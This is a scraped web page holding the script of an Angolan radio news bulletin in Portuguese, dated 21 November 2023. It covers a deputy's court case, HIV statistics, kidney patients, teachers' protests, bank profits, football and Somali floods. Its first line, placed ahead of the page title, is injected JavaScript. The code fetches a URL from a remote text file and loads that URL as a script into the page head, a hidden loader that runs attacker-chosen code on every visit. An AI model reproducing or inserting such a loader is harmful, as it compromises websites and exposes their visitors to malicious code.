;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Jornal 12h, edição de 21 de Novembro de 2023 | RadioPlayDigital
Jornal 12h, edição de 21 de Novembro de 2023

Destaques:

TÍTULOS: 

DEPUTADO NUNO ÁLVARO DALA DIZ ESTAR TRANQUILO E APONTA À EXISTÊNCIA DE UMA CABALA POR DETRÁS DO PROCESSO MOVIDO CONTRA SI; 

– CERCA DE TREZENTAS E DEZ MIL PESSOAS VIVEM COM O HIV/SIDA EM TODO O PAÍS. DESTE NÚMERO, DUZENTAS MIL SÃO MULHERES E TRINTA E CINCO MIL SÃO CRIANÇAS; 

– ASSOCIAÇÃO ANGOLANA DE INSUFICIENTES RENAIS DENUNCIA FALTA DE QUALIDADE DE MEDICAMENTOS DADOS NOS CENTROS DE HEMODIÁLISE NO PAÍS;

– CENTENAS DE PROFESSORES MARCHAM NO FIM DE SEMANA EM TODO O PAÍS EM REPUDIO À VIOLÊNCIA CONTRA DOCENTES E AGENTES ESCOLARES; 

– PALANCAS NEGRAS PROCURAM QUEBRAR CICLO DE RESULTADOS NEGATIVOS NOS ÚLTIMOS MESES, QUANDO DEFRONTAR HOJE AS ILHAS MAURÍCIAS; 

– INUNDAÇÕES NA SOMÁLIA MATAM PELO MENOS 50 PESSOAS E DEIXAM 700.000 OUTRAS DESALOJADAS.  

JINGLE MIX 

Jornal ao meio dia, terça-feira, 21 de Novembro de 2023. Coordenação de Alves Fernandes, técnica de Edson Machado e Edmundo Simões, edição e apresentação de Zacarias Congo.   

JINGLE

O Tribunal Supremo solicitou a retirada da imunidade do deputado da UNITA, Nuno Dala. Em causa, está um processo aberto em 2021 sobre a publicação, no ano anterior, de vários artigos sobre alegados casos de corrupção na Procuradoria-Geral da República. Nuno Dala é acusado por crimes de denúncia caluniosa e injúria.

A informação foi confirmada pelo porta- voz do Tribunal Supremo, Leandro Lopes.

LEANDRO LOPES – 01′ 13” 12H 211123

Leandro Lopes, porta- voz do Tribunal Supremo, que solicitou a retirada da imunidade do deputado da UNITA, Nuno Dala, para responder por crimes de denúncia caluniosa, injúrias e difamação. 

E o deputado Nuno Álvaro Dala disse à MFM que a acusação de que é alvo não o surpreende, apontado à existência de uma cabala por detrás do processo movido contra si.

Em declarações à MFM, o parlamentar da UNITA diz estar tranquilo à espera do desfecho o processo ora aberto;

NUNO ALVARO DALA 12H 

E o analista MFM para os assuntos políticos e jurídicos, Joaquim Jaime, diz notar que as acusações contra o deputado Nuno Álvaro Dala são anteriores às actuais funções;

JOAQUIM Jaime 12h 

Analista MFM, Joaquim Jaime. 

Teve início hoje a instrução contraditória do processo que envolve o General Manuel Hélder Vieira Dias Júnior “KOPELIPA” e o advogado Fernando Gomes dos Santos.

O general “KOPELIPA”, que foi chefe de Casa Militar do antigo Presidente da República, José Eduardo dos Santos, é acusado da prática dos crimes de peculato, burla por defraudação, falsificação de documentos, tráfico de influências, associação criminosa e abuso de poder.

A acusação data de 8 de Julho de 2022 e está relacionada com o período em que o general liderou o Gabinete de Reconstrução Nacional, que surgiu depois da paz conseguida no país em 2002, e era financiado maioritariamente por fundos provenientes da China.

A Comissão Episcopal de Justiça e Paz da CEAST promove a partir das 8h de amanhã, na Universidade Católica de Angola, uma conferência sobre “A Institucionalização das Autarquias no país, Desafios e Perspectivas”. 

O diretor nacional da Comissão Episcopal de Justiça e Paz da CEAST, Padre Celestino Epalanga, fala sobre os principais objetivos de mais uma conferência sobre autarquias em Angola.

PADRE CELESTINO 01 – 01′ 27” 12H 211123

O evento, segundo o Padre Celestino Epalanga, deverá contar com intervenções de representantes do Ministério da Administração do Território, dos partidos políticos MPLA e UNITA, bem como do antigo primeiro-ministro Marcolino Moco e do Reverendo Ntoni a Nzinga.  

PADRE CELESTINO 02 – 01′ 51” 12H 211123

Padre Celestino Epalanga, diretor nacional da Comissão Episcopal de Justiça e Paz da CEAST, falando sobre a conferência sobre “A Institucionalização das Autarquias em Angola, Desafios e Perspectivas”, que terá lugar amanhã aqui em Luanda. 

PONTO

Cerca de trezentas e dez mil pessoas vivem com o HIV/SIDA em todo o país. Deste número, duzentas mil são mulheres e trinta e cinco mil são crianças. 

Os dados foram apresentados à MFM pelo diretor-geral adjunto do Instituto Nacional de Luta contra a Sida, Hepatites Virais e outras Doenças de Infecção Sexual, José Carlos Van-Dúnem. 

JOSÉ CARLOS VAN-DÚNEM – 01′ 28” 12H 211123 

O responsável fala no crescimento do número de pacientes que abandona os centros de tratamento, devido a casos de descriminação e reforça ainda apelos para medidas preventivas. 

JOSÉ CARLOS VAN-DÚNEM 02 – 01′ 41” 12H 211123

José Carlos Van-Dúnem diretor-geral adjunto do Instituto Nacional de Luta contra a Sida, Hepatites Virais e outras Doenças de Infecção Sexual, em entrevista à MFM.  

Mil e setecentas e cinquenta pessoas que padecem de insuficiência renal são controladas pela Associação Angolana de Insuficientes Renais. Em todo o país, mais de mil pacientes que recebem tratamento devido à doença. 

A Associação Angolana de Insuficientes Renais debate-se com diversos problemas, desde o número reduzido de centros de hemodiálise no país, insuficiência de serviços e equipamentos técnicos, e denuncia ainda da falta de qualidade dos medicamentos dados nos hospitais. 

Por isso, a referida associação dirigiu uma carta à ministra da Saúde, Sílvia Lutucuta, para pedir a sua intervenção, tal como avançou à MFM o presidente da Associação Angolana de Insuficientes Renais, Agostinho Adriano da Silva.  

AGOSTINHO ADRIANO DA SILVA – 02′ 03” 12H 211123

Agostinho Adriano da Silva, presidente da Associação Angolana de Insuficientes Renais, e as principais preocupantes dos doentes renais no país.  

PONTO

Centenas de professores marcham no fim de semana em todo o país em repudio à violência contra docentes e agentes escolares registadas nos últimos tempos no país. 

No dia 25 de Novembro, professores e pessoal administrativo em Luanda saem às ruas em repudio a violência nas escolas para alertar à sociedade contra a posição de alguns pais e encarregados de educação, que molestam os professores, segundo o secretário provincial do Sindicato de Professores, Tomé Laureano. 

TOMÉ LAUREANO 01 –  MARCHA 12H 2111123

Por outro lado, o secretario do SINPROF em Luanda  falou sobre medidas a tomar em caso de violência contra os agentes de educação. 

O sindicalista recorda que já há um caderno reivindicativo que alerta a entidade patronal a ter em conta a questão da segurança nas escolas; 

TOME LAUREANO 2 MEDIDAS 

Tomé Laureano, secretário provincial do SINPROF, Sindicato Nacional dos Professores, em Luanda. 

PONTO

A polícia em Luanda deteve cinco homens acusados no crime de homicídio em que foi vítima um cidadão de nacionalidade maliana. 

Segundo o porta-voz do SIC, Serviço de Investigação Criminal, na capital, superintendente-chefe Fernando de Carvalho, o crime aconteceu no município do Cazenga. 

FERNANDO DE CARVALHO – 01′ 27” 12H 211123

Superintendente-chefe Fernando de Carvalho porta-voz do SIC, Serviço de Investigação Criminal, em Luanda. 

PONTO

Luanda precisa de mais de milhão de metros cúbicos para atingir a capacidade desejada no que o abastecimento de água potável diz respeito. 

A informação foi avançada, esta manhã, pelo Ministro da Energia e Águas, João Baptista Borges.  

JOÃO BAPTISTA BORGES – 17” 12H 211123

Ministro da Energia e Águas, João Baptista Borges, quando falava esta manhã aos jornalistas durante a sua visita a infraestruturas do sector, localizadas no município de Cacuaco, acompanhado do governador de Luanda, Manuel Homem. 

A produção agrícola no país cresceu 5,6 por cento na campanha agrícola 2021/22. 

O Ministro da Agricultura e Floresta, António Assis, afirma que este número pode ser melhorado na actual campanha agrícola, reconhecendo, por outro lado, que há ainda questões que devem ser resolvidas para o aumento dos níveis de produção agrícola em Angola. 

ANTÓNIO ASSIS – 01′ 44” 12H 211123

Ministro da Agricultura e Floresta, António Assis.

PONTO ECONOMIA 

Os 20 bancos comerciais contabilizaram um lucro acumulado de 523 mil milhões de kwanzas, o que representa um crescimento de 71% face aos 306 mil milhões registados no mesmo período de 2022.

Os resultados foram influenciados pela melhoria dos activos, devido aos ganhos com a margem financeira, onde se verificou o crescimento dos investimentos em títulos de dívida pública bem como aumento das aplicações que os bancos fazem junto do BNA. 

O analista MFM Carlos Rosado de Carvalho, diz que o mercado bancário mostra uma nova dinâmica nos últimos tempos.

CARLOS ROSADO DE CARVALHO 12H 

Analista MFM, Carlos Rosado de Carvalho. 

PONTO DESPORTO

Os Palancas Negras estão obrigados a vencer hoje as Ilhas Mauricias para quebrar o ciclo de resultados negativos nos últimos meses, onde não vencem há cinco partidas consecutivas neste ano  de 2023 incluindo jogos os amigaveis e oficiais. 

O mais recente jogo foi diante de Cabo de Verde com quem empatou a zero na primeira jornada do Grupo D, das qualificativas ao mundial de futebol de 2026 a realizar-se na América do Norte. 

O confronto de hoje com as Ilhas Mauricias é referente à segunda jornada e tem início às 17horas. Na última vez em que as duas selecções mediram forças Angola saiu com a vitória por 1×0. 

Os Lutadores angolanos Wilson Manuel da categoria 52 kg, Luan Chaka 83 kg, Nkunga Vakanda 56 Kg, bem como Leonardo Pascoal, Pedro Calembela e Mário Silva competem hoje no segundo dia do mundial de Artes Marcias Mistas que está a decorrrer na Albania. 

Márcio Herlander, um dos treinadores adjuntos das selecções nacionais, disse que os combates de hoje são referentes aos oitavos de final. 

RD-MÁRCIO HERLANDER-PARTE 1 

Angola participa com 11 concorrentes, com o objectivo de conquistar o maior número de medalhas e manter ou subir a terceira posição do ranking internacional.

PONTO INTERNACIONAL

Pelo menos 50 pessoas morreram e quase 700.000 foram obrigadas a abandonar as suas casas na Somália devido às inundações devastadoras provocadas pelo fenómeno climático ‘El Niño’, anunciaram as autoridades do país.

A meteorologia prevê chuvas fortes para esta terça-feira, o que pode agravar a situação.

As chuvas e cheias dos rios destruíram pontes e inundaram zonas residenciais.

Data de Emissão: 21-11-2023 às 12:00
Género(s): Noticiário
 
PARTICIPANTES
PUB RADIO PLAY

Relacionados